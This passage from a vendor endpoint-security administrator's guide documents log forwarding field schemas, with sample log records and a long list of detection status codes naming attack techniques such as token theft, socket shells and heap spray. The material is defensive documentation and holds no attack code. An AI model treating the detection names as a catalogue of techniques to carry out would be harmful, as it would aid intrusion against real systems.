isVdi Indicates whether the endpoint is a virtual desktop

infrastructure (VDI):
• 0—The endpoint is not a VDI
• 1—The endpoint is a VDI

osVersion Full version number of the operating system

running on the endpoint. For example,
6.1.7601.19135.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 467

© 2020 Palo Alto Networks, Inc.
 Field Name Description

is64 Indicates whether the endpoint is running a 64-bit

version of Windows:
• 0—The endpoint is not running x64 architecture
• 1—The endpoint is running x64 architecture

agentIp IP address of the endpoint.

deviceName Hostname of the endpoint on which the event was

logged.

deviceDomain Domain to which the endpoint belongs.

severity Syslog severity level associated with the event.

• 2—Critical. Used for events that require
immediate attention.
• 3—Error. Used for events that require special
handling.
• 4—Warning. Used for events that sometimes
require special handling.
• 5—Notice. Used for normal but significant
events that can require attention.
• 6—Informational. Informational events that do
not require attention.
Each event also has an associated Cortex XDR
severity. See the messageData.trapsSeverity
field for details.

trapsSeverity Severity level associated with the event defined for

Cortex XDR. Each of these severities corresponds
to a syslog severity level:
• 0—Informational. Informational messages that
do not require attention. Identical to the syslog 6
(Informational) severity level.
• 1—Low. Used for normal but significant events
that can require attention. Corresponds to the
syslog 5 (Notice) severity level.
• 2—Medium. Used for events that sometimes
require special handling. Corresponds to the
syslog 4 (Warning) severity level.
• 3—High. Used for events that require special
handling. Corresponds to the syslog 3 (Error)
severity level.
• 4—Critical. Used for events that require
immediate attention. Corresponds to the syslog
2 (Critical) severity level.
See also the severity log field.

agentVersion Version of the Cortex XDR agent.

468 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description

contentVersion Content version in the local security policy.

protectionStatus Cortex XDR agent protection status:

• 0—Protected
• 1—OsVersionIncompatible
• 2—AgentIncompatible

preventionKey Unique identifier for security events.

moduleId Security module name.

profile Name of the security profile that triggered the

event.

moduleStatusId Identifies the specific component of Cortex XDR

modules.
• CYSTATUS_ABNORMAL_PROCESS_TERMINATION
• CYSTATUS_ALIGNED_HEAP_SPRAY_DETECTED
• CYSTATUS_CHILD_PROCESS_BLOCKED
• CYSTATUS_CORE_LIBRARY_LOADED
• CYSTATUS_CORE_LIBRARY_UNLOADING
• CYSTATUS_CPLPROT_BLACKLIST
• CYSTATUS_CPLPROT_REMOTE_DRIVE
• CYSTATUS_CPLPROT_REMOVABLE_DRIVE
• CYSTATUS_CYINJCT_DISPATCH
• CYSTATUS_CYINJCT_MAPPING
• CYSTATUS_CYVERA_PREVENTION
• CYSTATUS_DANGEROUS_SYSTEM_SERVICE_CALLED
• CYSTATUS_DEMO_EVENT
• CYSTATUS_DEP_SEH_INF_VIOLATION
• CYSTATUS_DEP_SEH_VIOLATION
• CYSTATUS_DEP_VIOLATION
• CYSTATUS_DEP_VIOLATION_UNALLOCATED
• CYSTATUS_DEVICE_BLOCKED
• CYSTATUS_DLLPROT_BLACKLIST
• CYSTATUS_DLLPROT_CURRENT_WORKING_DIRECTORY
• CYSTATUS_DLLPROT_REMOTE_DRIVE
• CYSTATUS_DLLPROT_REMVABLE_DRIVE
• CYSTATUS_DOTNET_CRITICAL
• CYSTATUS_DSE
• CYSTATUS_EPM_INIT_FAILED
• CYSTATUS_FAILED_CHECK_MEDIA
• CYSTATUS_FILE_DELETION_BOOT_DONE
• CYSTATUS_FILE_DELETION_FAILED
• CYSTATUS_FILE_DELETION_SUCCEEDED
• CYSTATUS_FINGERPRINTING_ATTEMPT
• CYSTATUS_FONT_PROT_DUQU

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 469

© 2020 Palo Alto Networks, Inc.
 Field Name Description
• CYSTATUS_FORBIDDEN_MEDIA
• CYSTATUS_FORBIDDEN_OPTICAL_MEDIA
• CYSTATUS_FORBIDDEN_REMOTE_MEDIA
• CYSTATUS_FORBIDDEN_REMOVABLE_MEDIA
• CYSTATUS_GS_COOKIE_CORRUPTED_COOKIE
• CYSTATUS_GUARD_PAGE_VIOLATION
• CYSTATUS_HASH_CONTROL
• CYSTATUS_HEAP_CORRUPTION
• CYSTATUS_HOOKING_ENTRY_POINT_FAILED
• CYSTATUS_HOTPATCH_HIJACKING
• CYSTATUS_ILLEGAL_EXECUTABLE
• CYSTATUS_ILLEGAL_UNSIGNED_EXECUTABLE
• CYSTATUS_INJ_APPCONTAINER_FAILURE
• CYSTATUS_INJ_CTX_FAILURE
• CYSTATUS_JAVA_FILE
• CYSTATUS_JAVA_PROC
• CYSTATUS_JAVA_REG
• CYSTATUS_JIT_EXCEPTION
• CYSTATUS_LINUX_BRUTEFORCE_PREVENTED
• CYSTATUS_LINUX_ROOT_ESCALATION_PREVENTED
• CYSTATUS_LINUX_SHELLCODE_PREVENTED
• CYSTATUS_LINUX_SOCKET_SHELL_PREVENTED
• CYSTATUS_LOCAL_ANALYSIS
• CYSTATUS_MACOS_DLPROT_CWD_HIJACK
• CYSTATUS_MACOS_DLPROT_DUPLICATE_PATH_CHECK
• CYSTATUS_MACOS_G02_BLOCK_ALL
• CYSTATUS_MACOS_G02_SIGNER_NAME_MISMATCH
• CYSTATUS_MACOS_G02_SIGN_LEVEL_BELOW_MIN
• CYSTATUS_MACOS_G02_SIGN_LEVEL_BELOW_PARENT
• CYSTATUS_MACOS_MALICIOUS_DYLIB
• CYSTATUS_MACOS_ROOT_ESCALATION_PREVENTED
• CYSTATUS_MALICIOUS_APK
• CYSTATUS_MALICIOUS_DLL
• CYSTATUS_MALICIOUS_EXE
• CYSTATUS_MALICIOUS_EXE_ASYNC
• CYSTATUS_MALICIOUS_MACRO
• CYSTATUS_MALICIOUS_STRING_DETECTED
• CYSTATUS_MEMORY_USAGE_LIMIT_EXCEEDED
• CYSTATUS_NOP_SLED_DETECTED
• CYSTATUS_NO_MEMORY
• CYSTATUS_NO_REGISTER_CORRECTED
• CYSTATUS_PREALLOCATED_ADDR_ACCESSED
• CYSTATUS_PROCESS_CREATION_VIOLATION
• CYSTATUS_QUARANTINE_FAILED
• CYSTATUS_QUARANTINE_SUCCEEDED
• CYSTATUS_RANSOMWARE
• CYSTATUS_RESTORE_FAILED

470 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description
• CYSTATUS_RESTORE_SUCCEEDED
• CYSTATUS_ROP_MITIGATION
• CYSTATUS_SEH_CRITICAL
• CYSTATUS_SEH_INF_CRITICAL
• CYSTATUS_SHELL_CODE_TRAP_CALLED
• CYSTATUS_STACK_OVERFLOW
• CYSTATUS_SUSPENDED_PROCESS_BLOCKED
• CYSTATUS_SUSPICIOUS_APC
• CYSTATUS_SUSPICIOUS_LINK_FILE
• CYSTATUS_SYSTEM_SCAN_FINISHED
• CYSTATUS_SYSTEM_SCAN_STARTED
• CYSTATUS_THREAD_INJECTION
• CYSTATUS_TLA_MODEL_NOT_LOADED
• CYSTATUS_TOKEN_THEFT_FILE_OPERATION
• CYSTATUS_TOKEN_THEFT_PROCESS_CREATED
• CYSTATUS_TOKEN_THEFT_REGISTRY_OPERATION
• CYSTATUS_TOKEN_THEFT_THREAD_CREATED
• CYSTATUS_TOKEN_THEFT_THREAD_INJECTED
• CYSTATUS_TOKEN_THEFT_THREAD_STARTED
• CYSTATUS_UASLR_CRITICAL
• CYSTATUS_UNALLOWED_CODE_SEGMENT
• CYSTATUS_UNAUTHORIZED_CALL_TO_SYSTEM_SERVICE
• CYSTATUS_UNSIGNED_CHILD_PROCESS_BLOCKED
• CYSTATUS_WILDFIRE_GRAYWARE
• CYSTATUS_WILDFIRE_MALWARE
• CYSTATUS_WILDFIRE_UNKNOWN

verdict Verdict for the file:

• 0—Benign
• 1—Malware
• 2—Grayware
• 4—Phishing
• 99—Unknown

preventionMode Action carried out by the Cortex XDR agent (block

or notify). The prevention mode is specified in the
rule configuration.

terminate Termination action taken on the file.

• 0—Cortex XDR did not terminate the file.
• 1—Cortex XDR terminated the file.

terminateTarget Termination action taken on the target file (relevant

for some child process execution events where
we terminate the child process but not the parent
process):
• 0—Target file was not terminated.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 471

© 2020 Palo Alto Networks, Inc.
 Field Name Description
• 1—Target file was terminated.

quarantine Quarantine action taken on the file:

• 0—File was not quarantined.
• 1—File was quarantined.

block Block action taken on the file:

• 0—File was not blocked
• 1—File was blocked.

postDetected Post detection status of the file:

• 0—Initial prevention.
• 1—Detected after an initial execution.

eventParameters(Array) Parameters associated with the type of event.

For example, username, endpoint hostname, and
filename.

sourceProcessIdx(Array) The prevention source process index in the

processes array.

targetProcessIdx(Array) Target process index in the processes array. A

missing or negative value means there is no target
process.

fileIdx(Array) Index of target files for specific security events

such as: Scanning, Malicious DLL, Malicious Macro
events.

processes(Array) All related details for the process file that triggered
an event:
• 1—System process ID
• 2—Parent process ID
• 3—File object corresponding to the process
executable file
• 4—Command line arguments (if any)
• 5—Description field of the VERSIONINFO
resource
• 6—File version field of the VERSIONINFO
resource

files(Array) File object includes:

• 1—SHA256 hash value of the file
• 2—SHA256 hash value of the macro
• 3—Raw full filepath
• 4—A predefined drive type: local, network
mapped drive, UNC path host, removable media,
etc.

472 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
 Field Name Description
• 5—File name (with no extension), such as
AdapterTroubleshooter
• 6—File extension (for example, EXE or DLL)
• 7—File type defined by the Cortex XDR agent
• 8—UTC file creation time
• 9—UTC file modification time
• 10—UTC file access time
• 11—File attributes bitmask
• 12—File size in bytes
• 13—Signer field of the code signing certificate

users(Array) Details about the active user on the endpoint when

the event occurred:
• 1—Username of the active user on the endpoint.
• 2—Domain to which the user account belongs.

urls(Array) Additional details related to a URL:

• 1—Raw URL
• 2—URL schema; For example: HTTP, HTTPS,
FTP, LDAP
• 3—Hostname in punycode
• 4—Host port
• 5—Canonicalized URL path part according to
schema requirements
• 6—Query parameters (for http\s only)
• 7—Fragment parameters (for http\s only)

description(Array) (Mac only) Description of components related

to Cortex XDR. For example, the description of
the ROP, JIT, Dylib hijacking modules for Mac
endpoints is Memory Corruption Exploit.

Config Logs
Syslog format: recordType, class, FUTURE_USE, subClassId, eventType, eventCategory, generatedTime,
serverTime, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion, regionId,
isEndpoint, severity, trapsSeverity, messageCode, friendlyName, FUTURE_USE, msgTextEn, userFullName,
userName, userRole, userDomain, additionalData(Array), messageCode, errorText, errorData, resultData
Email body format example:

recordType: system
messageData/class: system
messageData/subClass: Provisioning
messageData/subClassId: 13
eventType: ServerLogPerTenant
messageData/eventCategory: tenant
generatedTime: 2019-01-31T18:15:19.000000+00:00
serverTime: 2019-01-31T18:15:19.000000+00:00
product:
facility: TrapsServerManagement

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 473

© 2020 Palo Alto Networks, Inc.
 customerId: 004403511
trapsId: 18520498190303952
serverHost: 14917869646-201.proda.brz
serverComponentVersion: 2.0.9+624
regionId:
isEndpoint: 0
agentId:
severity: notice
messageData/trapsSeverity: informational
messageData/messageCode: 19015
messageData/friendlyName: User Login
messageData/msgTextLoc:
messageData/msgTextEn: User [email protected] has logged in with
role superadmin
endPointHeader/userFullName:
endPointHeader/username:
endPointHeader/userRole:
endPointHeader/userDomain:
endPointHeader/agentTime:
endPointHeader/tzOffset:
endPointHeader/osType:
endPointHeader/isVdi:
endPointHeader/osVersion:
endPointHeader/is64:
endPointHeader/agentIp:
endPointHeader/deviceName:
endPointHeader/deviceDomain:
endPointHeader/agentVersion:
endPointHeader/contentVersion:
endPointHeader/protectionStatus:
messageData/userFullName:
messageData/username:
messageData/userRole:
messageData/userDomain:
messageData/messageName:
messageData/messageId:
messageData/processStatus:
messageData/errorText:
messageData/errorData:
messageData/resultData:
messageData/parameters:
messageData/additionalData: {}

Field Name Description

recordType Record type associated with the event and that you
can use when managing logging quotas. In this case,
the record type is config which includes logs related
to Cortex XDR administration and configuration
changes.

class Class of Cortex XDR log. System logs have a value

of system.

subClass Subclass of event. Used to categorize logs in Cortex

XDR.

474 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description

subClassId Numeric representation of the subClass field for

easy sorting and filtering.

eventType Subtype of event.

eventCategory Category of event, used internally for processing

the flow of logs. Event categories vary by class:
• config—deviceManagement,
distributionManagement, reportManagement,
securityEventManagement, systemManagement
• policy—exceptionManagement,
policyManagement, profileManagement, sam
• system—licensing, provisioning, tenant,
userAuthentication, workerProcessing
• agent_log—agentFlow

generatedTime Coordinated Universal Time (UTC) equivalent

of the time at which an event was logged. For
agent events, this represents the time on the
endpoint. For policy, configuration, and system
events, this represents the time on Cortex XDR
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

serverTime Coordinated Universal Time (UTC) equivalent of

the time at which the server generated the log. If
the log was generated on an endpoint, this field
identifies the time the server received the log
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

facility The Cortex XDR system component that

initiated the event, for example: TrapsAgent,
TrapsServiceCore, TrapsServiceManagement, and
TrapsServiceBackend.

customerId The ID that uniquely identifies the Cortex Data

Lake instance which received this log record.

trapsId Tenant external ID.

serverHost Hostname of Cortex XDR.

serverComponentVersion Software version of Cortex XDR.

regionId ID of Cortex XDR region:

• 10—Americas (N. Virginia)
• 70—EMEA (Frankfurt)

isEndpoint Indicates whether the event occurred on an

endpoint.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 475

© 2020 Palo Alto Networks, Inc.
 Field Name Description
• 0—No, host is not an endpoint.
• 1—Yes, host is an endpoint.

agentId Unique identifier for the Cortex XDR agent.

severity Syslog severity level associated with the event.

• 2—Critical. Used for events that require
immediate attention.
• 3—Error. Used for events that require special
handling.
• 4—Warning. Used for events that sometimes
require special handling.
• 5—Notice. Used for normal but significant
events that can require attention.
• 6—Informational. Informational events that do
not require attention.
Each event also has an associated Cortex XDR
severity. See the messageData.trapsSeverity
field for details.

trapsSeverity Severity level associated with the event defined for

Cortex XDR. Each of these severities corresponds
to a syslog severity level:
• 0—Informational. Informational messages that
do not require attention. Identical to the syslog 6
(Informational) severity level.
• 1—Low. Used for normal but significant events
that can require attention. Corresponds to the
syslog 5 (Notice) severity level.
• 2—Medium. Used for events that sometimes
require special handling. Corresponds to the
syslog 4 (Warning) severity level.
• 3—High. Used for events that require special
handling. Corresponds to the syslog 3 (Error)
severity level.
• 4—Critical. Used for events that require
immediate attention. Corresponds to the syslog
2 (Critical) severity level.
See also the severity log field.

messageCode System-wide unique message code.

friendlyName Descriptive log message name.

msgTextEn Description of the event, in English.

userFullName Full username of Cortex XDR user.

userName Username associated with Cortex XDR user.

476 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description

userRole Role assigned to Cortex XDR user.

userDomain Domain to which the user belongs.

agentTime Coordinated Universal Time (UTC) equivalent of the

time at which an agent logged an event in ISO-8601
string representation.

tzOffset Effective endpoint time zone offset from UTC, in

minutes.

osType Operating system of the endpoint:

• 1—Windows
• 2—OS X/macOS
• 3—Android
• 4—Linux

isVdi Indicates whether the endpoint is a virtual desktop

infrastructure (VDI):
• 0—The endpoint is not a VDI
• 1—The endpoint is a VDI

osVersion Full version number of the operating system

running on the endpoint. For example,
6.1.7601.19135.

is64 Indicates whether the endpoint is running a 64-bit

version of Windows:
• 0—The endpoint is not running x64 architecture
• 1—The endpoint is running x64 architecture

agentIp IP address of the endpoint.

deviceName Hostname of the endpoint on which the event was

logged.

deviceDomain Domain to which the endpoint belongs.

agentVersion Version of the Cortex XDR agent.

contentVersion Content version in the local security policy.

protectionStatus Cortex XDRagent protection status:

• 0—Protected
• 1—OsVersionIncompatible
• 2—AgentIncompatible

userFullName Full name of Cortex XDR user.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 477

© 2020 Palo Alto Networks, Inc.
 Field Name Description

userName Username associated with Cortex XDR user.

userRole Role assigned to Cortex XDR user.

userDomain Domain to which the user belongs.

messageName Name of the message.

messageId Unique numeric identifier of the message.

processStatus State of the process related to the event.

errorText If known, a description of the documented error.

errorData Parameters related to an event error.

resultData Parameters related to a successful event.

parameters Parameters supplied in the log message.

additionalData(Array) Additional information regarding event parameters.

loggedInUser User that is logged in to the Cortex XDR.

Analytics Logs
Syslog format: recordType, class, FUTURE_USE, eventType, eventCategory, generatedTime, serverTime,
agentTime, tzOffset, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion,
regionId, isEndpoint, agentId, osType, isVdi, osVersion, is64, agentIp, deviceName, deviceDomain, severity,
agentVersion, contentVersion, protectionStatus, sha256, type, parentSha256, lastSeen, fileName, filePath,
fileSize, localAnalysisResult, reported, blocked, executionCount
Email body format example:

recordType: analytics
messageData/class: agent_data
messageData/subClass:
eventType: AgentTimelineEvent
messageData/eventCategory: hash
generatedTime: 2019-01-31T18:00:43Z
serverTime: 2019-01-31T18:59:46.586Z
endPointHeader/agentTime: 2019-01-31T18:00:43Z
endPointHeader/tzOffset: -480
product:
facility: TrapsAgent
customerId: 110044035
trapsId: 18520039498190352
serverHost: coreop-f-proda-mnmauto03930348053-311.proda.brz
serverComponentVersion: 2.0.9+564
regionId: 10
isEndpoint: 1
agentId: 3bcf7e5ff56e2891c78684a38b728e49
endPointHeader/osType: 2

478 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
endPointHeader/isVdi: 0
endPointHeader/osVersion: 10.12.6
endPointHeader/is64: 1
endPointHeader/agentIp: 192.168.0.21
endPointHeader/deviceName: Jeffreys-MacBook-Pro.local
endPointHeader/deviceDomain:
severity:
endPointHeader/agentVersion: 5.0.5.1193
endPointHeader/contentVersion: 42-6337
endPointHeader/protectionStatus: 0
messageData/sha256:
87e27ba9128d9c3b3d113c67623a06817a030b3bbb4d2871d1e6da9002206f26
messageData/type: macho
messageData/parentSha256:
messageData/lastSeen: 2019-01-31T18:00:43Z
messageData/fileName: crashpad_handler
messageData/filePath: /users/username/library/google/googlesoftwareupdate/
googlesoftwareupdate.bundle/contents/macos/
messageData/fileSize: 353680
messageData/localAnalysisResult:
"{""contentVersion"":""42-6337"",""result"":""Benign"",""trusted"":""None"",
""publishers"":[""developer id application: google, inc.
(eqhxz8m8av)""],""resultId"":0,""trustedId"":0}"
messageData/reported: 0
messageData/blocked: 0
messageData/executionCount: 4179

Field Name Description

recordType Record type associated with the event and that you
can use when managing logging quotas. In this case,
the record type is analytics which includes hash
execution reports from the agent.

class Class of Cortex XDR log: config, policy, system, and

agent_log.

eventType Subtype of event.

eventCategory Category of event, used internally for processing

the flow of logs. Event categories vary by class:
• config—deviceManagement,
distributionManagement,
securityEventManagement, systemManagement
• policy—exceptionManagement,
policyManagement, profileManagement, sam
• system—licensing, provisioning, tenant,
userAuthentication, workerProcessing
• agent_log—agentFlow

generatedTime Coordinated Universal Time (UTC) equivalent

of the time at which an event was logged. For
agent events, this represents the time on the
endpoint. For policy, configuration, and system
events, this represents the time on Cortex XDR

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 479

© 2020 Palo Alto Networks, Inc.
 Field Name Description
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

serverTime Coordinated Universal Time (UTC) equivalent of

the time at which the server generated the log. If
the log was generated on an endpoint, this field
identifies the time the server received the log
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

agentTime Coordinated Universal Time (UTC) equivalent of the

time at which an agent logged an event in ISO-8601
string representation.

tzOffset Effective endpoint time zone offset from UTC, in

minutes.

facility The Cortex XDR system component that

initiated the event, for example: TrapsAgent,
TrapsServiceCore, TrapsServiceManagement, and
TrapsServiceBackend.

customerId The ID that uniquely identifies the Cortex Data

Lake instance which received this log record.

trapsId Tenant external ID.

serverHost Hostname of Cortex XDR.

serverComponentVersion Software version of Cortex XDR.

regionId ID of Cortex XDR region:

• 10—Americas (N. Virginia)
• 70—EMEA (Frankfurt)

isEndpoint Indicates whether the event occurred on an

endpoint.
• 0—No, host is not an endpoint.
• 1—Yes, host is an endpoint.

agentId Unique identifier for the Cortex XDR agent.

osType Operating system of the endpoint:

• 1—Windows
• 2—OS X/macOS
• 3—Android
• 4—Linux

isVdi Indicates whether the endpoint is a virtual desktop

infrastructure (VDI):

480 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description
• 0—The endpoint is not a VDI
• 1—The endpoint is a VDI

osVersion Full version number of the operating system

running on the endpoint. For example,
6.1.7601.19135.

is64 Indicates whether the endpoint is running a 64-bit

version of Windows:
• 0—The endpoint is not running x64 architecture
• 1—The endpoint is running x64 architecture

agentIp IP address of the endpoint.

deviceName Hostname of the endpoint on which the event was

logged.

deviceDomain Domain to which the endpoint belongs.

severity Syslog severity level associated with the event.

• 2—Critical. Used for events that require
immediate attention.
• 3—Error. Used for events that require special
handling.
• 4—Warning. Used for events that sometimes
require special handling.
• 5—Notice. Used for normal but significant
events that can require attention.
• 6—Informational. Informational events that do
not require attention.
Each event also has an associated Cortex XDR
severity. See the messageData.trapsSeverity
field for details.

agentVersion Version of the Cortex XDR agent.

contentVersion Content version in the local security policy.

protectionStatus Cortex XDR agent protection status:

• 0—Protected
• 1—OsVersionIncompatible
• 2—AgentIncompatible

sha256 Hash of the file using SHA256 encoding.

type Type of file:

• 0—Unknown
• 1—PE
• 2—Mach-o

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 481

© 2020 Palo Alto Networks, Inc.
 Field Name Description
• 3—DLL
• 4—Office file (containing a macro)

parentSha256 Hash of the parent file using SHA256 encoding.

lastSeen Coordinated Universal Time (UTC) equivalent of

the time when the file last ran on an endpoint
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

fileName File name, without the path or the file type

extension.

filePath Full path, aligned to the OS format.

fileSize Size of the file in bytes.

localAnalysisResult This object includes the content version, local

analysis module version, verdict result, file signer,
and trusted signer result. The trusted signer result is
an integer value:
• 0—Cortex XDR did not evaluate the signer of the
file.
• 1—The signer is trusted.
• 2—The signer is not trusted.

reported Reporting status of the file, in integer value:

• 0—Cortex XDR did not report the security event.
• 1—Cortex XDR reported the security event.

blocked Blocking status of the file, in integer value:

• 0—Cortex XDR did not block the process or file.
• 1—Cortex XDR blocked the process or file.

executionCount The total number of times a file identified by a

specific hash was executed.

System Logs
Syslog format: recordType, class, FUTURE_USE, subClassId, eventType, eventCategory, generatedTime,
serverTime, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion, regionId,
isEndpoint, agentId, severity, trapsSeverity, messageCode, friendlyName, FUTURE_USE, msgTextEn,
userFullName, username, userRole, userDomain, agentTime, tzOffset, osType, isVdi, osVersion, is64,
agentIp, deviceName, deviceDomain, agentVersion, contentVersion, protectionStatus, userFullName,
username, userRole, userDomain, messageName, messageId, processStatus, errorText, errorData,
resultData, parameters, additionalData(Array)
Email body format example:

recordType: system

482 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
messageData/class: system
messageData/subClass: Provisioning
messageData/subClassId: 13
eventType: ServerLogPerTenant
messageData/eventCategory: tenant
generatedTime: 2019-01-31T18:15:19.000000+00:00
serverTime: 2019-01-31T18:15:19.000000+00:00
product:
facility: TrapsServerManagement
customerId: 004403511
trapsId: 18520498190303952
serverHost: 14917869646-201.proda.brz
serverComponentVersion: 2.0.9+624
regionId:
isEndpoint: 0
agentId:
severity: notice
messageData/trapsSeverity: informational
messageData/messageCode: 19015
messageData/friendlyName: User Login
messageData/msgTextLoc:
messageData/msgTextEn: User [email protected] has logged in with
role superadmin
endPointHeader/userFullName:
endPointHeader/username:
endPointHeader/userRole:
endPointHeader/userDomain:
endPointHeader/agentTime:
endPointHeader/tzOffset:
endPointHeader/osType:
endPointHeader/isVdi:
endPointHeader/osVersion:
endPointHeader/is64:
endPointHeader/agentIp:
endPointHeader/deviceName:
endPointHeader/deviceDomain:
endPointHeader/agentVersion:
endPointHeader/contentVersion:
endPointHeader/protectionStatus:
messageData/userFullName:
messageData/username:
messageData/userRole:
messageData/userDomain:
messageData/messageName:
messageData/messageId:
messageData/processStatus:
messageData/errorText:
messageData/errorData:
messageData/resultData:
messageData/parameters:
messageData/additionalData: {}

Field Name Description

recordType Record type associated with the event and that

you can use when managing logging quotas. In this
case, the record type is system which includes logs
related to automated system management and
agent reporting events.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 483

© 2020 Palo Alto Networks, Inc.
 Field Name Description

class Class of Cortex XDR log. System logs have a value

of system.

subClass Subclass of event. Used to categorize logs in Cortex

XDR user interface.

subClassId Numeric representation of the subClass field for

easy sorting and filtering.

eventType Subtype of event.

eventCategory Category of event, used internally for processing

the flow of logs. Event categories vary by class:
• config—deviceManagement,
distributionManagement,
securityEventManagement, systemManagement
• policy—exceptionManagement,
policyManagement, profileManagement, sam
• system—licensing, provisioning, tenant,
userAuthentication, workerProcessing
• agent_log—agentFlow

generatedTime Coordinated Universal Time (UTC) equivalent

of the time at which an event was logged. For
agent events, this represents the time on the
endpoint. For policy, configuration, and system
events, this represents the time on Cortex XDR
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

serverTime Coordinated Universal Time (UTC) equivalent of

the time at which the server generated the log. If
the log was generated on an endpoint, this field
identifies the time the server received the log
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

facility The Cortex XDR system component that

initiated the event, for example: TrapsAgent,
TrapsServiceCore, TrapsServiceManagement, and
TrapsServiceBackend.

customerId The ID that uniquely identifies the Cortex Data

Lake instance which received this log record.

trapsId Tenant external ID.

serverHost Hostname of Cortex XDR.

serverComponentVersion Software version of Cortex XDR.

484 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description

regionId ID of Cortex XDR region:

• 10—Americas (N. Virginia)
• 70—EMEA (Frankfurt)

isEndpoint Indicates whether the event occurred on an

endpoint.
• 0—No, host is not an endpoint.
• 1—Yes, host is an endpoint.

agentId Unique identifier for the Cortex XDR agent.

severity Syslog severity level associated with the event.

• 2—Critical. Used for events that require
immediate attention.
• 3—Error. Used for events that require special
handling.
• 4—Warning. Used for events that sometimes
require special handling.
• 5—Notice. Used for normal but significant
events that can require attention.
• 6—Informational. Informational events that do
not require attention.
Each event also has an associated Cortex XDR
severity. See the messageData.trapsSeverity
field for details.

trapsSeverity Severity level associated with the event defined for

Cortex XDR. Each of these severities corresponds
to a syslog severity level:
• 0—Informational. Informational messages that
do not require attention. Identical to the syslog 6
(Informational) severity level.
• 1—Low. Used for normal but significant events
that can require attention. Corresponds to the
syslog 5 (Notice) severity level.
• 2—Medium. Used for events that sometimes
require special handling. Corresponds to the
syslog 4 (Warning) severity level.
• 3—High. Used for events that require special
handling. Corresponds to the syslog 3 (Error)
severity level.
• 4—Critical. Used for events that require
immediate attention. Corresponds to the syslog
2 (Critical) severity level.
See also the severity log field.

messageCode System-wide unique message code.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 485

© 2020 Palo Alto Networks, Inc.
 Field Name Description

friendlyName Descriptive log message name.

msgTextEn Description of the event, in English.

userFullName Full username of Cortex XDR user.

userName Username associated with Cortex XDR user.

userRole Role assigned to Cortex XDR user.

userDomain Domain to which the user belongs.

agentTime Coordinated Universal Time (UTC) equivalent of the

time at which an agent logged an event in ISO-8601
string representation.

tzOffset Effective endpoint time zone offset from UTC, in

minutes.

osType Operating system of the endpoint:

• 1—Windows
• 2—OS X/macOS
• 3—Android
• 4—Linux

isVdi Indicates whether the endpoint is a virtual desktop

infrastructure (VDI):
• 0—The endpoint is not a VDI
• 1—The endpoint is a VDI

osVersion Full version number of the operating system

running on the endpoint. For example,
6.1.7601.19135.

is64 Indicates whether the endpoint is running a 64-bit

version of Windows:
• 0—The endpoint is not running x64 architecture
• 1—The endpoint is running x64 architecture

agentIp IP address of the endpoint.

deviceName Hostname of the endpoint on which the event was

logged.

deviceDomain Domain to which the endpoint belongs.

agentVersion Version of the Cortex XDR agent.

contentVersion Content version in the local security policy.

486 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
 Field Name Description

protectionStatus Cortex XDR agent protection status:

• 0—Protected
• 1—OsVersionIncompatible
• 2—AgentIncompatible

userFullName Full name of Cortex XDR user.

userName Username associated with Cortex XDR user.

userRole Role assigned to Cortex XDR user.

userDomain Domain to which the user belongs.

messageName Name of the message.

messageId Unique numeric identifier of the message.

processStatus State of the process related to the event.

errorText If known, a description of the documented error.

errorData Parameters related to an event error.

resultData Parameters related to a successful event.

parameters Parameters supplied in the log message.

additionalData(Array) Additional information regarding event parameters.

loggedInUser User that is logged in to the Cortex XDR.

Analytics Logs
Format: recordType, class, FUTURE_USE, eventType, category, generatedTime, serverTime, agentTime,
tzoffset, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion, regionId,
isEndpoint, agentId, osType, isVdi, osVersion, is64, agentIp, deviceName, deviceDomain, severity,
agentVersion, contentVersion, protectionStatus, sha256, type, parentSha256, lastSeen, fileName, filePath,
fileSize, localAnalysisResult, reported, blocked, executionCount
Email body format example:

recordType: analytics
messageData/class: agent_data
messageData/subClass:
eventType: AgentTimelineEvent
messageData/eventCategory: hash
generatedTime: 2019-01-31T18:00:43Z
serverTime: 2019-01-31T18:59:46.586Z
endPointHeader/agentTime: 2019-01-31T18:00:43Z
